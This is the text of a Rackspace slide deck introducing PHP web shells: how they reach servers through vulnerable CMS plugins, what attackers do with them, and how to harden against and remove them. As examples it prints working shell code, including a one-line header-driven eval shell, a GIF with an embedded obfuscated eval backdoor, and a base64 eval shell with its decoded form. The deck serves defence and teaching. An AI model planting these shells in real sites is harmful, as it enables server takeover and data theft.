An introduction to php shells

An introduction to PHP shells

Richard Mahoney, Developer Support Engineer

Created by: Richard Mahoney

Modified Date:09/05/2013

Classification: Public

RACKSPACE® HOSTING | WWW.RACKSPACE.COM

About Me

•PHP developer before becoming a Linux SysAdmin 6 years ago •Joined Rackspace in 2013•Several years of experience with web app security•Is a Certified Ethical Hacker

2


About this presentation

•What PHP shells are and why they exist•Where they come from•How to defend against the threat•Removal•Q & A

3

RACKSPACE® HOSTING | WWW.RACKSPACE.COM 4

So, what is a PHP shell?


What is a PHP shell?

•A malicious file containing PHP functions such as eval() and shell_exec() •Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE•Usually obfuscated: eval(base64_decode('JF9HRVRbY10='));•Used to run arbitrary commands supplied by the attacker•The most common variant is the C99 shell

5


How much of a threat?

•Worst case: root compromise via a kernel exploit or simply by looking through files for passwords•But that's not really needed...•As the Apache user it can:•Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining•Steal data by using MySQL credentials found in PHP files•Host illegal material•Send out huge amounts of spam (very common)•Be used as a proxy for launching attacks on other servers, including those behind the same firewall

6


Here’s what one looks like

7


How did it get onto my server?


Where did it come from?

•The vast majority are via vulnerable third-party plugins for Wordpress, Joomla etc•Automated bots scan for the presence of these plugins and notify the attacker•The attacker then uploads the malicious code, typically to an /uploads or /media directory by exploiting the vulnerable website•The attacker visits the malicious shell script via a browser or by using a tool such as cURL•All of these steps could be scripted to continually compromise hosts and build a botnet•But, don't forget (S)FTP or your own code as an attack vector

9


Defending against the threat


The golden rule

•Never trust user input•Validate and sanitise as appropriate•The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe•Use PHP functions such as filter_var()•Strip null bytes from filenames by using trim()•Check the contents of any file uploaded to the server. Do not rely on file extensions•Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF:

GIF89aÂ???Â??????????????????!??^DÂ????????????,????????????Â???Â??????^B^B

DÂ???;???

<?php

@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc =

$_GET['osc'];

if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ...

11


Another example

•Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard Wordpress install due to it's use in Javascript libraries:

root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l

33

•But it's easy for an attacker to evade scans. This is a fully working PHP shell:

<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>

Where the HTTP header A is set to the string “eval”, and B can be any PHP function.

12


What else can I do?

•Create a .htaccess file in any directories which shouldn't contain PHP code•In the contents:

php_flag engine off

•Ensure SFTP/FTP passwords are strong•Apache log files should be owned by root to prevent LFI (local file inclusion) attacks•Never run Apache as root•Install anti virus software and set it to scan on write

13


Removal


Example of a compromised server

This /images directory contains 3 PHP shells:

[root@web1 images]# ls -l *.php

-rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php

-rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php

-rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php

The contents:

<?php

eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP

U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNl

NzIzMzY1NjA2MzY4Jzs=')); ?>

15


Example of a compromised server

Which evaluates to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo

'37372b37322e3233302e3135383a767832636b72653e723365606368';

To make these safe, move them to somewhere like “/root/compromised_files” if you want to investigate further, or just delete them.If you can't/don't want to move the files, chmod to 000 and set the owner to root to disable access:

[root@web1 images]# ls -l *.php

---------- 1 root root 123617 Jun 19 16:09 404.php

---------- 1 root root 11684 Jun 19 17:34 mlr2.php

---------- 1 root root 24364 Jun 30 17:43 wso.php

16


Next steps

•Check for unusual files in places such as /tmp and /var/cache•Use “ls -la” to show hidden directories•Study the output of “lsof”•If malicious files owned by root are found, wipe the server and reinstall•Update all software on the server, including any CMS addons/plugins•Perform a virus scan

17


Any Questions?


Further reading

The Open Web Application Security Project – (OWASP) Top 10: owasp.org

The PHP Security Guide: phpsec.org

/r/Netsec: reddit.com/r/netsec

19

RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218

US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM

RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COMRACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM

RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ

UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK

Presentations & Public Speaking

An introduction to php shells